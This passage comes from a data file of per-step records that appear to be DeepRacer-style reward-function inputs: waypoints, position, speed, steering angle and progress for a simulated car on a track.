1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.6128402448619172, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.970047571665471, 'all_wheels_on_track': True, 'distance_from_center': 0.012950611627412687, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095911678188735, 'object_in_camera': False, 'heading': 1.0553793308345887, 'objects_speed': [], 'progress': 3.2721339010189485, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 11.0},
{'is_left_of_center': True, 'projection_distance': 0.7285704934836759, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.7017125943659805, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9681031055656205, 'all_wheels_on_track': True, 'distance_from_center': 0.011124211652744676, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095992343579433, 'object_in_camera': False, 'heading': 0.2767237291255475, 'objects_speed': [], 'progress': 3.7267413826129663, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 12.0},
{'is_left_of_center': True, 'projection_distance': 0.8016274740696829, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.774765480699354, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9669335292069253, 'all_wheels_on_track': True, 'distance_from_center': 0.01004660075486568, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095998714493209, 'object_in_camera': False, 'heading': -0.1052403210258782, 'objects_speed': [], 'progress': 4.100438197504255, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 13.0},
{'is_left_of_center': True, 'projection_distance': 0.8745401089016366, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.8476821136791086, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9706337566148887, 'all_wheels_on_track': True, 'distance_from_center': 0.013824792099549267, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095972148979683, 'object_in_camera': False, 'heading': 0.7218580573268512, 'objects_speed': [], 'progress': 4.473396663395899, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 14.0},
{'is_left_of_center': True, 'projection_distance': 0.9669518365713616, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.9401014233882807, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776753407209586, 'all_wheels_on_track': True, 'distance_from_center': 0.020965191453877558, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096028325562612, 'object_in_camera': False, 'heading': 1.9265306120411614, 'objects_speed': [], 'progress': 4.946095754047778, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 15.0},
{'is_left_of_center': True, 'projection_distance': 1.0607562161378383, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.033901501422587, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776927210085827, 'all_wheels_on_track': True, 'distance_from_center': 0.02106558857389254, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984499001538, 'object_in_camera': False, 'heading': 1.173909182022218, 'objects_speed': [], 'progress': 5.425918456624128, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 16.0},
{'is_left_of_center': True, 'projection_distance': 1.1450366160526708, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
